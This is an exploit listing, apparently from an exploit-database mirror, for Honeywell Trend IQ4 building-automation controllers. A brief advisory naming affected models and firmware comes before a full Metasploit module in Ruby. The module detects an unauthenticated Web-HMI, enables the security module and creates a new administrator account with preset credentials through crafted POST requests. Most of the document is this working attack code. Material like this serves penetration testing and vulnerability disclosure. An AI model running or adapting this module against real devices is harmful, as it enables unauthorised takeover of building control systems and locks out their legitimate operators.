Share
## https://sploitus.com/exploit?id=PACKETSTORM:216634
=============================================================================================================================================
    | # Title     : Honeywell Trend IQ4 Unauthenticated Admin Creation โ€“ Metasploit Module                                                      |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://buildings.honeywell.com/gb/en/products/by-brand/trend/iq4-controllers                                               |
    =============================================================================================================================================
    
    [+] Summary    :  This Metasploit module targets a default unauthenticated access vulnerability in Honeywell International Inc.
                      specifically affecting the Trend IQ4 controller series.
    				  The vulnerability allows unauthenticated access to the device's Web-HMI interface when authentication is not enforced. By exploiting this condition, an attacker can:
    
    Enable the Security Module
    
    Create a new Administrator account
    
    Enforce authentication on the device
    
    Disable unrestricted public access
    
    [+]  Affected Models
    
    IQ4E
    
    IQ412
    
    IQ422
    
    IQ4NC
    
    IQ41x
    
    IQ3
    
    IQECO
    
    [+] Affected Firmware Versions
    
    4.36 (build 4.3.7.9)
    
    4.34 (build 4.3.5.14)
    
    3.52 (build 3.5.3.15)
    
    3.50
    
    3.44
    
    
    				  
    [+] POC   :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = GreatRanking
    
      include Msf::Exploit::Remote::HttpClient
      prepend Msf::Exploit::Remote::AutoCheck
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Honeywell Trend IQ4 Unauthenticated Admin Creation',
          'Description'    => %q{
            This module exploits an insecure default configuration in Honeywell Trend IQ4 controllers. 
            By default, these devices do not enforce authentication, allowing a remote user to 
            enable the User Module and create a new administrative account. 
            Note: This action permanently changes the device configuration and enforces 
            authentication, effectively locking out unauthenticated access.
          },
          'Author'         => [ 'indoushka' ],
          'License'        => MSF_LICENSE,
          'References'     => [ 
            [ 'ZSL', '2026-5979' ], 
            [ 'URL', 'https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5979.php' ] 
          ],
          'DisclosureDate' => '2025-03-03',
          'Notes'          => {
            'Stability'   => [ CRASH_SAFE ],
            'SideEffects' => [ CONFIG_CHANGES, ACCOUNT_LOCKOUTS, IOC_IN_LOGS ]
          },
          'Targets'        => [ [ 'Honeywell Trend IQ4 Series (Web Management)', {} ] ],
          'DefaultTarget'  => 0,
          'DefaultOptions' => { 
            'SSL'      => false,
            'WfsDelay' => 5 
          }
        ))
    
        register_options([
          OptString.new('TARGETURI', [true, 'Base path to the Web-HMI', '/']),
          OptString.new('USERNAME',  [true, 'New Admin Username', 'bms_admin']),
          OptString.new('PASSWORD',  [true, 'New Admin Password', 'P@ssw0rd123!']),
          Opt::RPORT(10001)
        ])
      end
    
      def check
        res = send_request_cgi({
          'uri'    => normalize_uri(target_uri.path.to_s, 'U.htm'),
          'method' => 'GET'
        })
    
        return CheckCode::Unknown('Target did not respond.') if res.nil?
        
        content_type = res.headers['Content-Type'] || ''
        body         = res.body || ''
        
        if res.code == 200 && content_type.include?('text/html')
          if body.include?('ActionModuleEntireReference') && body.include?('ovrideStart')
            return CheckCode::Vulnerable('Web-HMI is exposed and unauthenticated.')
          end
        elsif [401, 403].include?(res.code)
          return CheckCode::Safe('Authentication is already enforced.')
        end
    
        CheckCode::Safe
      end
    
      def exploit
        uri_confirm = normalize_uri(target_uri.path.to_s, 'confirmAction.htm')
        uri_user    = normalize_uri(target_uri.path.to_s, 'U.htm')
    
        print_status("Step 1/2: Enforcing security module configuration...")
        res_enable = send_request_cgi({
          'uri'       => uri_confirm,
          'method'    => 'POST',
          'vars_post' => {
            'Action' => 'Create',
            'ActionModuleEntireReference' => 'U',
            'ActionFields' => '$|req,W|req|conf',
            'ovrideStart'  => '0'
          }
        })
    
        fail_with(Failure::Unreachable, 'Connection lost during module activation.') if res_enable.nil?
        
        unless [200, 301, 302].include?(res_enable.code)
          print_error("Unexpected status code received: #{res_enable.code}")
        end
    
        print_status("Step 2/2: Injecting administrator credentials: #{datastore['USERNAME']}...")
        res_admin = send_request_cgi({
          'uri'       => uri_user,
          'method'    => 'POST',
          'vars_post' => {
            'U0($)newVal'   => datastore['USERNAME'],
            'U0(W)newVal'   => datastore['PASSWORD'],
            'U0(W)confVal'  => datastore['PASSWORD'],
            'U0($)req'      => '1',
            'U0(W)req'      => '1',
            'Action'        => 'Create',
            'ServerCommand' => 'Create',
            'ModuleFullName'=> 'U'
          }
        })
    
        fail_with(Failure::Unreachable, 'Connection lost during credential injection.') if res_admin.nil?
    
        if [200, 301, 302].include?(res_admin.code)
          print_good("Admin account created successfully.")
          print_warning("Note: The device is now secured. Use your new credentials to access the HMI.")
        else
          fail_with(Failure::UnexpectedReply, "Account creation failed. Status: #{res_admin.code}")
        end
      end
    end
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================